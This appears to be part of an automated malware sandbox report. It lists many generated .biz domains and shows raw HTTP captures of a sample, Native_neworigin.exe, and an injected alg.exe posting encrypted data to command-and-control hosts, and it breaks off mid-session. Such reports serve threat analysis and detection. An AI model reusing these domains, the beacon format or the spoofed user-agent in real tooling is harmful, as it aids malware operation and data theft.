                                                                                                                                                                                                                                                                                                                                                    • dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                    • nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                    • ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                    • myups.biz
                                                                                                                                                                                                                                                                                                                                                    • oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                    • yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                    • jpskm.biz
                                                                                                                                                                                                                                                                                                                                                    • lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                    • wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                    • gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                    • jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                    • acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                    • vyome.biz
                                                                                                                                                                                                                                                                                                                                                    • yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                    • iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                    • sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                    • vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                    • ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                    • typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                    • esuzf.biz
                                                                                                                                                                                                                                                                                                                                                    • gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                    • qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                    • brsua.biz
                                                                                                                                                                                                                                                                                                                                                    • dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                    • oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                    • yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                    • mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                    • opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                    • jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                    • mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                    • warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                    • gcedd.biz
                                                                                                                                                                                                                                                                                                                                                    • jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                    • xccjj.biz
                                                                                                                                                                                                                                                                                                                                                    • hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                    • rynmcq.biz

                                                                                                                                                                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    0192.168.2.104974454.244.188.177803976C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:27.092875957 CET359OUTPOST /omhtttbpfwdopn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:27.092942953 CET836OUTData Raw: cb 4c 5a af a4 96 3d 03 38 03 00 00 7d d3 6c 1c b4 70 af 1f 40 63 a8 ba c3 11 a4 2d ab 11 42 ec 16 2f 2f 43 93 91 05 e6 0f 81 4c 66 e7 28 f6 39 ae d3 72 cb 8e 8b eb ab 01 b6 bf 1c e4 4d a9 03 02 ab 88 70 5d 90 06 8a 66 e3 90 e8 0b 8e a8 ad af 1a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: LZ=8}lp@c-B//CLf(9rMp]fOgU8+IJn@8|\'8C:kl{8w2WIr^-Qd!n%SSUHN_8'HWW,UoBY0<l]hqoC)^NikbE
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:28.466295958 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:12:28 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=352235faf8ce283a8ea2681fd48cc548|8.46.123.75|1732605148|1732605148|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    1192.168.2.104975354.244.188.177806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:30.031168938 CET361OUTPOST /ulvxycyjutwdmypq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:30.031202078 CET778OUTData Raw: e0 fe e1 f1 47 a4 a3 d3 fe 02 00 00 41 e2 62 77 e4 94 2c 40 bd 21 93 f7 05 3d 0a 6c 55 c2 6e 9d 4c a0 39 cc 56 fa bf 1f 19 f0 58 1f 78 fe 4b 54 c4 0c 61 9c 4b a8 20 2e 70 aa 79 31 4c aa 88 9c 4f 10 55 43 52 23 a8 43 b7 19 08 1b c1 54 0b 95 36 15
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: GAbw,@!=lUnL9VXxKTaK .py1LOUCR#CT6s^HQf{9QOtgXEqr'p%hX4o8&iz5 UE^rnS-in?;Tpq@(#0^`tPb;Vbpn!'OpW%zgp0}S
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:31.363255978 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:12:31 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=a2e1e2d1b8ef6c9be00659336ce81aa8|8.46.123.75|1732605151|1732605151|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    2192.168.2.104975718.141.10.107803976C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:30.386816978 CET350OUTPOST /nkbiquv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:30.386866093 CET836OUTData Raw: b4 b4 20 4a 70 3e 7e 75 38 03 00 00 73 ed 73 5e 33 50 ff 21 a2 11 a6 21 04 47 36 3a 9b bd d1 20 08 17 74 b6 e4 be 60 63 b2 d6 ca 71 39 0f eb ae f6 e9 99 70 a1 c0 36 9c de 44 cd c5 4b 15 fe 53 c1 9c 45 cc cc 29 6e 5a 07 64 90 4a f8 c7 3b ce 4f 90
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Jp>~u8ss^3P!!G6: t`cq9p6DKSE)nZdJ;OGXfmA&,7*49KU5O>ou!&TR.W5#3FldE7SB>g6RyVNA1ulO<ktT 'm!T& m
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:32.504640102 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:12:32 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=e2c0a272392a91dbb98a44f2a3d1e9f0|8.46.123.75|1732605152|1732605152|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    3192.168.2.104976418.141.10.107806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:32.809432030 CET359OUTPOST /eupqxdgegqjrgdpv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:32.809432030 CET778OUTData Raw: 31 27 e9 e1 a9 f3 24 9a fe 02 00 00 1b 7f 13 bc ad 1c 7d e4 ec e4 80 c5 30 ec 19 74 07 22 c8 18 76 30 e1 f0 55 64 9e fc ab 24 89 9e f5 0f c3 56 cd 94 6d e7 a8 00 12 92 28 be 50 6e 95 79 0d 5c 76 7d 57 a8 6a 59 0e 0d 13 58 df a1 5f 4d 48 20 30 c7
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 1'$}0t"v0Ud$Vm(Pny\v}WjYX_MH 0| ~MzH%#[Y?P 6Tzw+Z}SDhL{)}2FMAN0~yD1|t,!6xGdI[L#?+z@H-K7moH6r2n(Aj
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:34.923429966 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:12:34 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=9383f00ee34fe5445dee990a00a20fee|8.46.123.75|1732605154|1732605154|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    4192.168.2.104976654.244.188.177803976C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:33.631994009 CET345OUTPOST /irvq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:33.631994009 CET836OUTData Raw: c0 87 57 a9 dd 77 f9 b2 38 03 00 00 f8 f7 86 c5 d8 92 9c b0 52 81 e7 4f ff ad f0 5f fe 26 43 0f ab 79 44 ce 10 53 9d b2 6d ec 55 08 fa 4b 16 16 23 38 5d bb 7e a3 3e 07 77 60 3d 99 ae 07 b6 8a 8d 78 a6 06 87 3f 7a 73 fa d4 58 e6 75 ee 7c 59 f4 05
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Ww8RO_&CyDSmUK#8]~>w`=x?zsXu|Y*GsbU$FcZ/Mx]x#d_oX7))!!F<R?Wbn=~tlH'kfO2B@%ZMoh+~N'{d&M=8_RJ|N
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:35.077266932 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:12:34 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=d3d50c9665f8901934285aeddd7bf29d|8.46.123.75|1732605154|1732605154|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    5192.168.2.104977254.244.188.177806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:35.924395084 CET342OUTPOST /s HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:35.924443960 CET778OUTData Raw: bf 59 06 80 bd 78 a1 0c fe 02 00 00 80 0b e1 47 29 b2 b8 34 4c e4 e8 db b9 31 70 bf 68 a1 24 c7 2b fe fd b4 35 97 98 14 fc ae d6 5c 32 0c 38 eb 01 59 99 5b 4a de 74 8c f0 8e 81 92 46 c0 64 3b 42 3a c6 17 d3 85 96 f3 c6 8d fe 6b e9 38 0c 8b 58 b1
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: YxG)4L1ph$+5\28Y[JtFd;B:k8XI>_Kf:5'KBO^4cC< +n%#lTZC\**4jPY[zqT.[qN2>h:o<DZ5@xVJ]f;]#*fQrF
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:37.326651096 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=21a31861624bc143b77e8a1a62416b6f|8.46.123.75|1732605157|1732605157|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    6192.168.2.104977344.221.84.105803976C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:36.104492903 CET358OUTPOST /xwcotmorefmmtc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:36.104509115 CET836OUTData Raw: 72 8d 67 ca 7b c8 f5 a5 38 03 00 00 59 e5 3f b2 c6 24 64 d1 ff d3 e9 6a 96 eb 9d 37 1a dc 7f fd a2 90 e5 63 ad b7 7b cc 6d ea d1 3c ac 89 6f 57 40 74 87 5a 5f ac 4d 85 e9 49 8a e3 9b 4d fe 64 56 d7 fe 33 88 f9 5c 47 38 d3 25 40 40 03 d5 dd 2c a6
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: rg{8Y?$dj7c{m<oW@tZ_MIMdV3\G8%@@,t0:S-NrvY6Z1'kQb)M+,n{ulA=v4S`vyT4ke@1u2A+;qV_5~puF1u`$
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:37.297108889 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=fd5150f49649d957bc955618d4876401|8.46.123.75|1732605157|1732605157|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    7192.168.2.1049780172.234.222.143803976C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.366269112 CET355OUTPOST /kgrfegimyutt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.366298914 CET836OUTData Raw: 20 1d bc 4e b7 ce 87 94 38 03 00 00 db eb fd 4f 97 c1 06 27 65 cc 60 d0 f5 16 80 d4 c2 8b a4 5d 54 df 03 8a 79 8e 27 64 67 2e 11 43 19 20 01 dd 8c cd fd d5 a0 5c 06 70 90 65 6e af e5 2e 3c e2 ca fc a8 a1 21 35 9e 9f 66 17 45 fa 4a f0 6d 8b 1e 2c
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: N8O'e`]Ty'dg.C \pen.<!5fEJm,4AM.<GZ3[w0.1SF" rFg{M;Ti@[XwM2s~:#)h lF%F8o*MB;XlUl!K7G7vqV'gf:mOE$


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    8192.168.2.104978144.221.84.105806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:39.250987053 CET353OUTPOST /rvwdmrjan HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:39.251013041 CET778OUTData Raw: 16 7c 99 89 52 d8 90 bc fe 02 00 00 c2 df 7f 65 63 22 c5 9d 55 f1 fd d5 80 5b 2d db 29 f9 d2 d4 d0 cd 90 6d 53 89 ab 36 5f 98 f6 5e ad 7a 37 f1 56 ba b2 b1 c4 98 24 f2 aa 1f e0 f7 59 be 50 c4 7a e8 85 47 cb 0c cc 42 d8 13 3f c2 48 ec 9d 65 95 c8
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: |Rec"U[-)mS6_^z7V$YPzGB?HePd}^ZaLF'ke1"aYfpNv!X45H7k/AX^#ZGG5 [sz#Bz\FgWND;_)}P
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:40.394444942 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:12:40 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=c65e8317dfbf4af1b1b9407257f3bc90|8.46.123.75|1732605160|1732605160|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    9192.168.2.1049782172.234.222.143803976C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:39.803112984 CET348OUTPOST /mbuec HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:39.803149939 CET836OUTData Raw: 64 1b 64 6c 1c 60 8b 55 38 03 00 00 4b 63 5c a7 0d ab d9 dc d6 56 87 c1 e4 41 80 66 2a 95 76 d4 1b c2 0a 82 07 c9 ac 3b 82 00 b2 6e a6 da 62 f7 b8 3d 86 97 ca e2 a8 22 87 81 ec 7e a4 eb ac 1e 54 b6 9e f2 cf 1c 5a ad 22 41 62 78 c4 d1 26 96 67 3e
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ddl`U8Kc\VAf*v;nb="~TZ"Abx&g>#i})PQW,KX!G~+&+_ ll2~y;~"D5y{fAe|!">STDYd&*OShG8:


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    10192.168.2.1049788172.234.222.143806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:41.513254881 CET346OUTPOST /avc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: przvgke.biz
